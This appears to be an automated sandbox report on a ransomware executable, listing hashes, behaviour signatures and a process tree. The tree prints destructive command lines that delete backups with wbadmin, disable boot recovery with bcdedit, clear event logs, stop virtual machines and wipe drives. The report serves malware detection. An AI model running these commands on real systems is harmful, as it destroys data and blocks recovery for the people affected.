Resubmissions

10-01-2024 13:21

240110-qlvy5ahag4 10

10-01-2024 12:17

240110-pf835afbdr 10

Analysis

  • max time kernel
    590s
  • max time network
    601s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-01-2024 13:21

General

  • Target

    a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe

  • Size

    3.2MB

  • MD5

    6d44f8f3c1608e5958b40f9c6d7b6718

  • SHA1

    9203ad3b6ffb7732591ef560965566555bce9d82

  • SHA256

    a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455

  • SHA512

    656eb44b563705e1045b6a881b4f8a462ecf3bb8b2421cb18dfa21421629f7af92fe4b72736edfe3fea2ea13bef84f5faab5a78b8ef2b4f656a9055d0c4a22bd

  • SSDEEP

    98304:wgwRevguPPFpugyxQkvA51nFbk+kUwWlGroD+1f:wgtv7ov5vqbk++AGkD+1f

Malware Config

Signatures

  • UAC bypass 3 TTPs 4 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (4481) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Sets file execution options in registry 2 TTPs 64 IoCs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies system executable filetype association 2 TTPs 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 19 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe
    "C:\Users\Admin\AppData\Local\Temp\a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe"
    1⤵
      PID:4376
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p58042791667523172 Everything64.dll
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4268
      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\3usdaa.exe
        "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\3usdaa.exe"
        2⤵
          PID:1984
          • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe
            "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"
            3⤵
            • UAC bypass
            • Sets file execution options in registry
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system executable filetype association
            • Adds Run key to start application
            • Checks whether UAC is enabled
            • Drops file in Program Files directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:4532
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c DC.exe /D
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3004
            • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe
              "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" -e ul2
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:1252
            • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe
              "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" -e ul1
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4492
            • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe
              "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" -e watch -pid 4532 -!
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:4420
            • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe
              "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe" -startup
              4⤵
              • Executes dropped EXE
              • Enumerates connected drives
              • Suspicious use of SetWindowsHookEx
              PID:3036
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3828
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4848
            • C:\Windows\SYSTEM32\powercfg.exe
              powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61
              4⤵
                PID:2500
              • C:\Windows\SYSTEM32\powercfg.exe
                powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
                4⤵
                  PID:592
                • C:\Windows\SYSTEM32\powercfg.exe
                  powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
                  4⤵
                    PID:4108
                  • C:\Windows\SYSTEM32\powercfg.exe
                    powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
                    4⤵
                      PID:5008
                    • C:\Windows\SYSTEM32\powercfg.exe
                      powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
                      4⤵
                        PID:2284
                      • C:\Windows\SYSTEM32\powercfg.exe
                        powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
                        4⤵
                          PID:4900
                        • C:\Windows\SYSTEM32\powercfg.exe
                          powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
                          4⤵
                            PID:5108
                          • C:\Windows\SYSTEM32\powercfg.exe
                            powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
                            4⤵
                              PID:448
                            • C:\Windows\SYSTEM32\powercfg.exe
                              powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
                              4⤵
                                PID:1028
                              • C:\Windows\SYSTEM32\powercfg.exe
                                powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
                                4⤵
                                  PID:552
                                • C:\Windows\SYSTEM32\powercfg.exe
                                  powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
                                  4⤵
                                    PID:3236
                                  • C:\Windows\SYSTEM32\powercfg.exe
                                    powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
                                    4⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • Modifies system executable filetype association
                                    • Adds Run key to start application
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:1984
                                  • C:\Windows\SYSTEM32\powercfg.exe
                                    powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
                                    4⤵
                                      PID:400
                                    • C:\Windows\SYSTEM32\powercfg.exe
                                      powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
                                      4⤵
                                        PID:2872
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg.exe -H off
                                        4⤵
                                          PID:64
                                        • C:\Windows\SYSTEM32\wbadmin.exe
                                          wbadmin.exe delete catalog -quiet
                                          4⤵
                                          • Deletes backup catalog
                                          PID:4752
                                        • C:\Windows\SYSTEM32\wbadmin.exe
                                          wbadmin.exe DELETE SYSTEMSTATEBACKUP
                                          4⤵
                                          • Deletes System State backups
                                          • Drops file in Windows directory
                                          PID:3128
                                        • C:\Windows\SYSTEM32\bcdedit.exe
                                          bcdedit.exe /set {default} recoveryenabled no
                                          4⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:5736
                                        • C:\Windows\SYSTEM32\bcdedit.exe
                                          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                          4⤵
                                          • Modifies boot configuration data using bcdedit
                                          PID:1592
                                        • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe
                                          "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe" -startup
                                          4⤵
                                          • Executes dropped EXE
                                          • Enumerates connected drives
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4724
                                        • C:\Windows\SysWOW64\notepad.exe
                                          notepad.exe "C:\Users\Admin\AppData\Local\----Read-Me-----.txt"
                                          4⤵
                                            PID:5832
                                          • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe
                                            "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe" -accepteula -p 1 -c F:\
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5960
                                          • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe
                                            "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe" -accepteula -p 1 -c C:\
                                            4⤵
                                            • Executes dropped EXE
                                            PID:5940
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" & cd /d "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"
                                            4⤵
                                              PID:5576
                                              • C:\Windows\SysWOW64\fsutil.exe
                                                fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"
                                                5⤵
                                                  PID:2960
                                              • C:\Windows\SysWOW64\wevtutil.exe
                                                wevtutil.exe cl application
                                                4⤵
                                                • Clears Windows event logs
                                                PID:3328
                                              • C:\Windows\SysWOW64\wevtutil.exe
                                                wevtutil.exe cl system
                                                4⤵
                                                • Clears Windows event logs
                                                PID:1828
                                              • C:\Windows\SysWOW64\wevtutil.exe
                                                wevtutil.exe cl security
                                                4⤵
                                                • Clears Windows event logs
                                                PID:532
                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe
                                            "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4620
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                            2⤵
                                              PID:3780
                                          • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\DC.exe
                                            DC.exe /D
                                            1⤵
                                            • Executes dropped EXE
                                            PID:1188
                                          • C:\Windows\System32\Systray.exe
                                            C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                            1⤵
                                              PID:316
                                            • C:\Windows\System32\Systray.exe
                                              C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                              1⤵
                                                PID:4984
                                              • C:\Windows\System32\Systray.exe
                                                C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                1⤵
                                                  PID:2304
                                                • C:\Windows\System32\Systray.exe
                                                  C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                  1⤵
                                                    PID:3968
                                                  • C:\Windows\System32\Systray.exe
                                                    C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                    1⤵
                                                      PID:1176
                                                    • C:\Windows\System32\Systray.exe
                                                      C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                      1⤵
                                                        PID:3172
                                                      • C:\Windows\System32\Systray.exe
                                                        C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                        1⤵
                                                          PID:2388
                                                        • C:\Windows\System32\Systray.exe
                                                          C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                          1⤵
                                                            PID:3040
                                                          • C:\Windows\System32\Systray.exe
                                                            C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                            1⤵
                                                              PID:5136
                                                            • C:\Windows\system32\BackgroundTaskHost.exe
                                                              "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                                                              1⤵
                                                                PID:5108
                                                              • C:\Windows\System32\Systray.exe
                                                                C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                1⤵
                                                                  PID:3896
                                                                • C:\Windows\system32\vssvc.exe
                                                                  C:\Windows\system32\vssvc.exe
                                                                  1⤵
                                                                    PID:6040
                                                                  • C:\Windows\system32\wbengine.exe
                                                                    "C:\Windows\system32\wbengine.exe"
                                                                    1⤵
                                                                      PID:5432
                                                                    • C:\Windows\System32\vds.exe
                                                                      C:\Windows\System32\vds.exe
                                                                      1⤵
                                                                      • Checks SCSI registry key(s)
                                                                      PID:5124
                                                                    • C:\Windows\System32\vdsldr.exe
                                                                      C:\Windows\System32\vdsldr.exe -Embedding
                                                                      1⤵
                                                                        PID:5136
                                                                      • C:\Windows\System32\Systray.exe
                                                                        C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                        1⤵
                                                                          PID:4616
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 127.2 -n 5
                                                                          1⤵
                                                                          • Runs ping.exe
                                                                          PID:4996
                                                                        • C:\Windows\System32\Systray.exe
                                                                          C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                          1⤵
                                                                            PID:4452
                                                                          • C:\Windows\System32\Systray.exe
                                                                            C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                            1⤵
                                                                              PID:5496

                                                                            Network

                                                                            MITRE ATT&CK Enterprise v15

                                                                            Replay Monitor

                                                                            Loading Replay Monitor...

                                                                            Downloads

                                                                            • C:\Users\Admin\AppData\Local\----Read-Me-----.txt

                                                                              Filesize

                                                                              846B

                                                                              MD5

                                                                              b3cf8ba8a828ff88f26927a1471adb95

                                                                              SHA1

                                                                              7f94cc6a7bcb1ee78948c6af9b2fb56e0ca94581

                                                                              SHA256

                                                                              8ab27c97d89eda105a145bdd1efb8f7f6b8736a3afeb2dc5a142e0e377810591

                                                                              SHA512

                                                                              8b93880d3738db301e57a229b07dad04cabaae3cad457485977ffb0c0abaf45aae776bd6603e65638044dbca163871277b9be660859c63a5d32c71f9b9d34562

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                              Filesize

                                                                              2KB

                                                                              MD5

                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                              SHA1

                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                              SHA256

                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                              SHA512

                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Filesize

                                                                              944B

                                                                              MD5

                                                                              6d3e9c29fe44e90aae6ed30ccf799ca8

                                                                              SHA1

                                                                              c7974ef72264bbdf13a2793ccf1aed11bc565dce

                                                                              SHA256

                                                                              2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                                                                              SHA512

                                                                              60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Filesize

                                                                              1KB

                                                                              MD5

                                                                              87dd60a6bd8b7d6c90230c57b86ab867

                                                                              SHA1

                                                                              67fdca992575b637cbebbbb5674cc16e93d9598f

                                                                              SHA256

                                                                              8ef8079a07081d4ed4376f55b8b5d3ceebd896ec9d42c1fb3e441658a93bd8ae

                                                                              SHA512

                                                                              906ad53219030c52728c96f6d94da4309e47ee3b78068ab34d8ad43945ff0fb96e502de717c5183c7db6162427e18a364ec0017dcfb12631834d381c20e990e1

                                                                            • C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe

                                                                              Filesize

                                                                              350KB

                                                                              MD5

                                                                              803df907d936e08fbbd06020c411be93

                                                                              SHA1

                                                                              4aa4b498ae037a2b0479659374a5c3af5f6b8d97

                                                                              SHA256

                                                                              e8eaa39e2adfd49ab69d7bb8504ccb82a902c8b48fbc256472f36f41775e594c

                                                                              SHA512

                                                                              5b9c44b4ed68b632360c66b35442722d2797807c88555c9fde9c176581d410e4f6ed433fabdcd9ee614db458158e6055a9f7f526ebfbc8e7f5f3d388f5de4532

                                                                            • memory/1148-147-0x00007FFCF8CC0000-0x00007FFCF9781000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1148-133-0x00007FFCF8CC0000-0x00007FFCF9781000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/1148-134-0x000001D9D3340000-0x000001D9D3350000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/1148-144-0x000001D9D3340000-0x000001D9D3350000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/3828-155-0x00007FFCF8CC0000-0x00007FFCF9781000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/3828-152-0x000002195AD60000-0x000002195AD70000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/3828-121-0x000002195AD60000-0x000002195AD70000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/3828-132-0x00007FFCF8CC0000-0x00007FFCF9781000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/3828-122-0x000002195AD60000-0x000002195AD70000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/4848-109-0x0000017EB2470000-0x0000017EB2480000-memory.dmp

                                                                              Filesize

                                                                              64KB

                                                                            • memory/4848-151-0x00007FFCF8CC0000-0x00007FFCF9781000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/4848-116-0x0000017EB23F0000-0x0000017EB2412000-memory.dmp

                                                                              Filesize

                                                                              136KB

                                                                            • memory/4848-108-0x00007FFCF8CC0000-0x00007FFCF9781000-memory.dmp

                                                                              Filesize

                                                                              10.8MB

                                                                            • memory/4848-110-0x0000017EB2470000-0x0000017EB2480000-memory.dmp

                                                                              Filesize

                                                                              64KB